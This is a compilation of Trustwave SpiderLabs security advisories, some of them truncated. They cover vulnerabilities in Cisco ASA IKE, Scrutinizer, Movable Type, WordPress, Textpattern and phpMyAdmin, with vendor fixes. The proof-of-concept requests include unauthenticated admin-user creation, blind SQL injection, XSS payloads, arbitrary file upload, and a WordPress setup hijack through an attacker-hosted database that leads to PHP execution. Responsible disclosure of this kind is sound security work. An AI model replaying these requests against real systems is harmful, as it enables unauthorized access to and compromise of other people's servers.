TWSL2013-004: Group Name Enumeration Vulnerability in Cisco IKE Implementation
Trustwave SpiderLabs Security Advisory TWSL2013-004: Group Name Enumeration Vulnerability in Cisco IKE Implementation https://www.trustwave.com/spiderlabs/advisories/TWSL2013-004.txt Published: 04/18/13 Version: 1.0 Vendor: Cisco (www.cisco.com) Product: ASA (Adaptive Security Appliance) Versions affected: 8.4(2), 8.4(5), 9.1(1) Product description: The Cisco ASA 5505 Adaptive Security Appliance is a next-generation, full-featured security appliance for small business, branch office, and enterprise teleworker environments. The Cisco ASA 5505 delivers high-performance firewall, SSL and IPsec VPN, and rich networking services in a modular, plug-and-play appliance. Finding 1: Group Name Enumeration Credit: Daniel Turner of Trustwave SpiderLabs CVE: CVE-2013-1194 CWE: CWE-206 Each VPN configuration is assigned a group name, which is used to manage separate Security Associations. Previous advisories have found that when a VPN endpoint is configured to allow Aggressive Mode IKE negotiations using PSK, a hash of the PSK can be captured and potentially cracked offline. In order to successfully crack this hash a correct group name is required. The above product versions are susceptible to a group name enumeration vulnerability, because of a difference in the way the device responds to correct and incorrect group names sent in the initial exchange packet. Similar to CSCeg00323 and CSCtj96108 where this was possible because of no response and a response with a DPD payload respectively. It has been found that it remains possible to distinguish a correct group name by the number of response packets sent by the device. A correct group name elicits three attempts to continue the handshake and an additional encrypted phase 2 packet, while the device will only respond twice to an incorrect group. Enumeration is slow because of the requirement to wait for the responding packets, but this has been successfully accomplished. Below are examples of the different responses: Example 1: #Request using invalid group name ike-scan 10.70.70.25 -M -A --id=incorrectgroup #Response using invalid group name 13:22:59.929273 IP 10.70.70.204.isakmp 10.70.70.25.isakmp: isakmp: phase 1 I agg 13:22:59.932624 IP 10.70.70.25.isakmp 10.70.70.204.isakmp: isakmp: phase 1 R agg 13:23:05.696571 IP 10.70.70.25.isakmp 10.70.70.204.isakmp: isakmp: phase 1 R agg Example 2: #Request using valid group name ike-scan 10.70.70.25 -M -A --id=correctgroup #Response using valid group name 13:23:05.693673 IP 10.70.70.204.isakmp 10.70.70.25.isakmp: isakmp: phase 1 I agg 13:23:13.690392 IP 10.70.70.25.isakmp 10.70.70.204.isakmp: isakmp: phase 1 R agg 13:23:21.690464 IP 10.70.70.25.isakmp 10.70.70.204.isakmp: isakmp: phase 1 R agg 13:23:29.690528 IP 10.70.70.25.isakmp 10.70.70.204.isakmp: isakmp: phase 1 R agg 13:23:37.691275 IP 10.70.70.25.isakmp 10.70.70.204.isakmp: isakmp: phase 2/others R inf[E] This information can be used to capture and crack a weak PSK if Aggressive Mode is enabled. Remediation Steps: The vendor will be releasing security fixes to the above issues and affected versions can be patched by installing the 8.4(6) firmware or the 9.1(2) firmware for the Cisco ASA platform. Administrators with other affected firmware versions should be aware that this information could be potentially be revealed and it is recommended that factory default group or easily guessable group names are not used. Additional Credits: Jonathan Claudius of Trustwave SpiderLabs: Confirmation of Vulnerability/Behavior on Cisco ASA 8.4(5) and 9.1(1) Revision History: 02/21/13 - Vulnerability disclosed 03/14/13 - Vendor acknowledges security issue 04/17/13 - Vendor releases security alert 04/18/13 - Advisory published References 1. http://www.cisco.com/warp/public/707/cisco-sn-20050624-vpn-grpname.shtml 2. http://www.cisco.com/en/US/products/csr/cisco-sr-20101124-vpn-grpname.html 3. http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1194 About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is
TWSL2012-014: Multiple Vulnerabilities in Scrutinizer NetFlow sFlow Analyzer
Trustwave SpiderLabs Security Advisory TWSL2012-014: Multiple Vulnerabilities in Scrutinizer NetFlow sFlow Analyzer Published: 07/27/12 Version: 1.0 Vendor: Plixer International (http://www.plixer.com) Product: Scrutinizer NetFlow and sFlow Analyzer Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions may be affected as well. Please note that the software can be found in a long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html for the partial list. Product description: Network analysis tool for monitoring the overall network health and reports on which hosts, applications, protocols, etc. that are consuming network bandwidth. Credits: Mario Ceballos of the Metasploit Project Jonathan Claudius of Trustwave Spiderlabs Finding 1: HTTP Authentication Bypass Vulnerability CVE: CVE-2012-2626 The Scrutinizer web console provides a form-based login facility, requiring users to authenticate to gain access to further functionality. A tiered user access model is also used, where administrative and standard users have a different selection of permissible functions. Authentication and authorization is controlled by the cookie-based session management system. Although this is implemented in a standardized way, the session tokens are not required to perform privileged functions, such as adding users. Example(s): This request will add a user named trustwave with the password of trustwave to the administrative user group. #Request POST /cgi-bin/admin.cgi HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Length: 70 tool=userprefsnewUser=trustwavepwd=trustwaveselectedUserGroup=1 #Response HTTP/1.1 200 OK Date: Wed, 25 Apr 2012 17:52:15 GMT Server: Apache Vary: Accept-Encoding Content-Length: 19 Content-Type: text/html; charset=utf-8 {new_user_id:2} Finding 2: Arbitrary File Upload Vulnerability CVE: CVE-2012-2627 The Scrutinizer web console is prone to unauthenticated arbitrary file upload vulnerability. An attacker could exploit this vulnerability to upload files to the affected systems file system as well as overwrite the Scrutinizer applications SNMP configuration. Example(s): This request will upload a test file to the following location: 'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt' Note: This affected folder also contains SNMP configuration files which could be overwritten if an attacker were to select the right file name. #Request POST /d4d/uploader.php HTTP/1.0 Host: A.B.C.D User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593 Content-Length: 210 --_Part_949_3365333252_3066945593 Content-Disposition: form-data; name=uploadedfile; filename=trustwave.txt Content-Type: application/octet-stream trustwave --_Part_949_3365333252_3066945593-- #Response HTTP/1.1 200 OK Date: Wed, 25 Apr 2012 17:39:15 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 41 Connection: close Content-Type: text/html {success:1,file_name:trustwave.txt} #Confirming on File System C:\type Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt trustwave Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php CVE: CVE-2012-3848 The Scrutinizer web console suffers from multiple Cross Site Scripting vulnerabilities in the following pages: 1.) /d4d/contextMenu.php 2.) /d4d/exporters.php These vulnerabilities include the following: 1.) XSS via arbitrary parameter 3.) XSS via referrer header Example(s): The following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php #Request 1 GET /d4d/exporters.php?ascriptalert(123)/script=1 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive #Response 1 snip a href=/d4d/exporters.php?ascriptalert(1)/script=1/d4d/exporters.php?ascriptalert(123)/script=1/a/td/tr snip #Request 2 GET /d4d/exporters.php HTTP/1.1 Host: A.B.C.D Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://D.E.F.G/search?hl=enq=ascriptalert(123)/script=1 Content-Length: 2 #Response 2 snip a href=http://D.E.F.G/search?hl=enq=ascriptalert(123)/script=1http://D.E.F.G/search?hl=enq=ascriptalert(123)/script=1/a snip Finding 4: Undocumented Default Admin MySQL Users CVE: CVE-2012-3951 The Scrutinizer application relies on an underlying Apache, MySQL and PHP installation which is installed as part of the scrutinizer installer
TWSL2012-008: Multiple Vulnerabilities in Scrutinizer NetFlow sFlow Analyzer
Trustwave SpiderLabs Security Advisory TWSL2012-008: Multiple Vulnerabilities in Scrutinizer NetFlow sFlow Analyzer https://www.trustwave.com/spiderlabs/advisories/TWSL2012-008.txt Published: 04/11/12 Version: 1.0 Vendor: Plixer International (http://www.plixer.com) Product: Scrutinizer NetFlow and sFlow Analyzer Version affected: 8.6.2 (8.6.2.16204) confirmed; others may be vulnerable Product description: Network analysis tool for monitoring the overall network health and reports on which hosts, applications, protocols, etc. that are consuming network bandwidth. Credit: Tanya Secker of Trustwave SpiderLabs Finding 1: HTTP Authentication Bypass Vulnerability CVE: CVE-2012-1258 The Scrutinizer web console provides a form-based login facility, requiring users to authenticate to gain access to further functionality. A tiered user access model is also used, where administrative and standard users have a different selection of permissible functions. Authentication and authorization is controlled by the cookie-based session management system. Although this is implemented in a standardized way, the session tokens are not required to perform privileged functions, such as adding users. Example: This request will add a user named trustwave with the password of trustwave to the administrative user group. #Request GET /cgi-bin/userprefs.cgi?newUser=trustwavepwd=trustwaveselectedUserGroup=1= HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive #Response HTTP/1.1 200 OK Date: Thu, 17 Nov 2011 10:19:25 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 19 {new_user_id:9} Finding 2: SQL Injection CVE: CVE-2012-1259 The Scrutinizer web console is prone to unauthenticated SQL Injection attacks due to user input not being appropriately validated and passed directly to the backend. An attacker could exploit this vulnerability to attempt to gain access to sensitive information within the database or to perform other attacks on the system. Example 1: These requests/responses below show a blind SQL injection vector, where a proof of concept is used to return a syntactically correct response from the server (200 OK) followed by an incorrect one (500 Internal Server Error). #Request 1 GET /cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=onname%3anew7%3a7=onname%3anew27%3a27=onname%3anew13%3a13=onstandalone=name%3anew5%3a5=onname%3anew14%3a14=onname%3anew9%3a9=onuser_id=name%3anew23%3a23=onname%3anew17%3a17=onname%3anew11%3a11=onname%3anew24%3a24=onaddip=')%20AND%20('a'='aname%3anew18%3a18=onname%3anew21%3a21=onname%3anew19%3a19=onname%3anew22%3a22=onnbaupdate=1name%3anew12%3a12=onname%3anew25%3a25=onname%3anew2%3a2=onname%3anew1%3a1=onname%3anew10%3a10=onname%3anew15%3a15=onname%3anew26%3a26=onname%3anew4%3a4=onname%3anew6%3a6=on HTTP/1.1 Host: 127.0.0.1 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi #Response 1 HTTP/1.1 200 OK Date: Tue, 31 Jan 2012 23:51:46 GMT Server: Apache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 230 #Request 2 GET /cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=onname%3anew7%3a7=onname%3anew27%3a27=onname%3anew13%3a13=onstandalone=name%3anew5%3a5=onname%3anew14%3a14=onname%3anew9%3a9=onuser_id=name%3anew23%3a23=onname%3anew17%3a17=onname%3anew11%3a11=onname%3anew24%3a24=onaddip=')%20ANffD%20('a'='aname%3anew18%3a18=onname%3anew21%3a21=onname%3anew19%3a19=onname%3anew22%3a22=onnbaupdate=1name%3anew12%3a12=onname%3anew25%3a25=onname%3anew2%3a2=onname%3anew1%3a1=onname%3anew10%3a10=onname%3anew15%3a15=onname%3anew26%3a26=onname%3anew4%3a4=onname%3anew6%3a6=on HTTP/1.1 Host: 127.0.0.1 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi #Response 2 HTTP/1.1 500 Internal Server Error Date: Tue, 31 Jan 2012 23:52:18 GMT Server: Apache Last-Modified: Fri, 17 Dec 2010 02:01:03 GMT ETag: 90001d93e-448-497918ae295c0 Accept-Ranges: bytes Content-Length: 1096 Vary: Accept-Encoding Connection: close Content-Type: text/html Example 2: The getPermissionsAndPreferences variable within the following request is also vulnerable to a blind time-based attack. The example payload included will result in the server taking a delay of approximately five seconds before returning a response. #Request http://127.0.0.1/cgi-bin/login.cgi?getPermissionsAndPreferences=1%20AND%20SLEEP(5)session_id=OyAOiECuFdtRbEBYnocache=12_13_12_734 Example 3:
TWSL2012-003: Cross-Site Scripting Vulnerability in Movable Type Publishing Platform
Trustwave's SpiderLabs Security Advisory TWSL2012-003: Cross-Site Scripting Vulnerability in Movable Type Publishing Platform https://www.trustwave.com/spiderlabs/advisories/TWSL2012-003.txt Published: 2012-02-24 Version: 1.0 Vendor: Six Apart (http://movabletype.org/) Product: Movable Type Version affected: Versions prior to 5.13, 5.07, and 4.38 Product description: Movable Type is a weblog publishing system developed by the company Six Apart. The software supports static page generation and includes functionality, such as managing files, user roles, templates, tags, categories, and trackback links. Credit: Jonathan Claudius of Trustwave SpiderLabs Finding 1: Cross-Site Scripting Vulnerability CVE: CVE-2012-1262 After extracting the Moveable Type CGI files and source files on to a web server, but before the application is fully installed, cross-site scripting vulnerabilities are present in the '/cgi-bin/mt/mt-wizard.cgi' page. Example(s): Performing XSS on dbuser parameter #Request POST /cgi-bin/mt/mt-wizard.cgi HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/cgi-bin/mt/mt-wizard.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 216 __mode=teststep=configureset_static_uri_to=default_language=en-usconfig=dbtype=mysqldbserver=localhostdbname=dbuser=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3Edbpass=testdbpath=dbport=dbsocket=test=1 #Response --snip--- pConnection error: Access denied for user 'scriptalert('123')/script'@'localhost' (using password: YES) at /var/www/cgi-bin/mt/extlib/Data/ObjectDriver/Driver/BaseCache.pm line 320 --snip--- Vendor Response: These issues have been addressed as of versions 5.13, 5.07, and 4.38. Remediation Steps: Customers should update to the latest version of Movable publishing platform in order to address these issues. The above issues have been corrected in versions 5.13, 5.07, and 4.38. Revision History: 01/11/12 - Vulnerability disclosed 02/21/12 - Patch released 02/24/12 - Advisory published References 1. http://www.movabletype.org/2012/02/movable_type_513_507_and_438_security_updates.html About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided as is without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this
TWSL2012-002: Multiple Vulnerabilities in WordPress
Trustwave's SpiderLabs Security Advisory TWSL2012-002: Multiple Vulnerabilities in WordPress https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt Published: 1/24/12 Version: 1.0 Vendor: WordPress (http://wordpress.org/) Product: WordPress Version affected: 3.3.1 and prior Product description: WordPress is a free and open source blogging tool and publishing platform powered by PHP and MySQL. Credit: Jonathan Claudius of Trustwave SpiderLabs Finding 1: PHP Code Execution and Persistent Cross Site Scripting Vulnerabilities via 'setup-config.php' page. CVE: CVE-2011-4899 The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. This typically requires a user to have valid MySQL credentials to complete. However, a malicious user can host their own MySQL database server and can successfully complete the WordPress installation without having valid credentials on the target system. After the successful installation of WordPress, a malicious user can inject malicious PHP code via the WordPress Themes editor. In addition, with control of the database store, malicious Javascript can be injected into the content of WordPress yielding persistent Cross Site Scripting. Proof of Concept: Servers Involved A.B.C.D = Target WordPress Web Server W.X.Y.Z = Malicious User's MySQL Instance 1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306 2.) Performs POST/GET Requests to Install WordPress into MySQL Instance Request #1 -- POST /wp-admin/setup-config.php?step=2 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do Content-Type: application/x-www-form-urlencoded Content-Length: 81 dbname=wordpressuname=jsmithpwd=jsmithdbhost=W.X.Y.Zprefix=wp_submit=Submit Request #2 -- GET /wp-admin/install.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT 3.) Get PHP Code Execution Malicious user edits 404.php via Themes Editor as follows: ?php phpinfo(); ? Note #1: Any php file in the theme could be used. Note #2: Depending settings, PHP may be used to execute system commands on webserver. Malicious user performs get request of modified page to execute code. Request --- GET /wp-content/themes/default/404.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 4.) Get Persistent Cross Site Scripting Malicious User Injects Malicious Javascript into their own MySQL database instance MySQL Query --- update wp_comments SET comment_content='scriptalert('123')/script' where comment_content='Hi, this is a comment.br /To delete \ a comment, just log in and view the post#039;s comments. There you will have the option to edit or delete them.'; Non-malicious User Visits Wordpress installation and has Javascript executed on their browser Request --- GET /?p=1 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Finding 2: Multiple Cross Site Scripting Vulnerabilities in 'setup-config.php' page CVE: CVE-2012-0782 The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. When using this installation page the user is asked to supply the database name, the server that the database resides on, and a valid MySQL username and password. During this process, malicious users can supply javascript within the dbname, dbhost or uname parameters. Upon clicking the submission button, the javascript is rendered in the client's browser. Proof of Concept: Servers Involved A.B.C.D = Target WordPress Web Server Request --- POST /wp-admin/setup-config.php?step=2 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1 Content-Type:
TWSL2012-001: Cross-Site Scripting Vulnerability in Textpattern Content Management System
Trustwave's SpiderLabs Security Advisory TWSL2012-001: Cross-Site Scripting Vulnerability in Textpattern Content Management System Published: 1/03/12 Version: 1.0 Vendor: Textpattern (http://textpattern.com/) Product: Textpattern Version affected: 4.4.1 before change set 3612 Product description: Textpattern is an open source content management system originally developed by Dean Allen. While it is often listed among weblogging tools, its aim is to be a general-purpose content management system suitable for deployment in many contexts. Textpattern is written in PHP using a MySQL database backend. Credit: Jonathan Claudius of Trustwave SpiderLabs Finding 1: Cross-Site Scripting Vulnerability CVE: CVE-2011-5019 After extracting the Textpattern source files on to a web server, but before the application is fully installed, cross-site scripting vulnerabilities are present in the '/textpattern/setup/index.php' page. Example(s): Performing XSS on ddb parameter #Request POST /textpattern/setup/index.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/textpattern/setup/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 156 duser=blahdpass=dhost=localhostddb=%3Cscript%3Ealert%28%27123%27%29%3C%2 Fscript%3Edprefix=siteurl=A.B.C.DSubmit=nextlang=en-usstep=print Config #Response HTTP/1.1 200 OK Date: Sat, 10 Dec 2011 02:46:44 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.2 Content-Length: 674 Connection: close Content-Type: text/html; charset=utf-8 snip-- div align=centerpChecking database connection/ppConnected/ppDatabase strongscriptalert('123')/script/strong does not exist or your specified user does not have permission to access it./p Remediation Steps: Textpattern change set 3612 includes a fix for this security issue. Upgrade to the latest version. Revision History: 12/23/11 - Vulnerability disclosed 12/23/11 - Patch released by vendor 1/03/12 - Advisory published About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided as is without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
TWSL2011-019: Cross-Site Scripting Vulnerability in phpMyAdmin
Trustwave's SpiderLabs Security Advisory TWSL2011-019: Cross-Site Scripting Vulnerability in phpMyAdmin https://www.trustwave.com/spiderlabs/advisories/TWSL2011-019.txt Published: 12/22/11 Version: 1.0 Vendor: phpMyAdmin (http://www.phpmyadmin.net/) Product: phpMyAdmin Version affected: 3.4.8 and prior Product description: An open source tool developed in PHP to manage and administer MySQL databases remotely. The web browser interface allows creating, modifying or deleting databases, tables, fields or rows, executing SQL statements, and other database functions. Credit: Jason Leyrer of Trustwave SpiderLabs Finding 1: Cross-Site Scripting (XSS) Vulnerability in Setup Interface CVE: CVE-2011-4782 Affected versions of phpMyAdmin do not sanitize user-supplied server names before displaying them in its Setup Overview. This allows remote attackers to execute arbitrary web scripts or HTML via a crafted request. phpMyAdmin allows users to add database servers via its Setup interface. Since phpMyAdmin doesn't do any input validation on server hostnames when they are entered, it is up to whatever displays these names throughout the application to use htmlspecialchars() (or similar) to sanitize them. phpMyAdmin uses a function called perform_config_checks() to perform a series of compatibility, security and consistency checks on application configuration options. If it finds settings that are contrary to best practices, perform_config_checks() generates messages to be displayed to users at the top of the Setup Overview page. The messages generated for some of these configuration options ($cfg['Servers'][$i]['ssl'], $cfg['Servers'][$i]['extension'], $cfg['Servers'][$i]['auth_type'], $cfg['Servers'][$i]['AllowRoot'], and $cfg['Servers'][$i]['AllowNoPassword']) are constructed using user-supplied hostnames without any sanitization taking place. This can lead to web script being executed when the Setup Overview page is loaded. The following is a Proof of Concept (PoC): 1. Request the Setup interface's index page in order to obtain the phpMyAdmin cookie and the value of 'token', which appears in the response body: Request --- GET /phpmyadmin/setup/index.php HTTP/1.1 Response HTTP/1.1 200 OK Date: Thu, 01 Dec 2011 16:42:17 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.2 Set-Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; path=/phpmyadmin/setup/; HttpOnly Expires: Thu, 01 Dec 2011 16:42:17 GMT Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 01 Dec 2011 16:42:17 GMT Set-Cookie: pma_lang=en; expires=Sat, 31-Dec-2011 16:42:17 GMT; path=/phpmyadmin/setup/; httponly X-Frame-Options: SAMEORIGIN X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net Pragma: no-cache Vary: Accept-Encoding Content-Length: 7722 Content-Type: text/html; charset=utf-8 ---snip--- input type=hidden name=token value=5acce3a965bbe9d42ce50bdf3d491ed9 / 2. Input javascript (%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E) to the 'Servers-0-host' input field in Add New Server mode, as shown in the postdata of the following request: Request --- POST /phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvftab_hash=check_page_refresh=1lang=encollation_connection=utf8_general_citoken=5acce3a965bbe9d42ce50bdf3d491ed9page=serversmode=addsubmit=New+server HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvftab_hash=check_page_refresh=1lang=encollation_connection=utf8_general_citoken=5acce3a965bbe9d42ce50bdf3d491ed9page=serversmode=addsubmit=New+server Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en Content-Type: application/x-www-form-urlencoded Content-Length: 1430
TWSL2011-018: Authentication Bypass Vulnerability in IBM TS3100/TS3200 Web User Interface
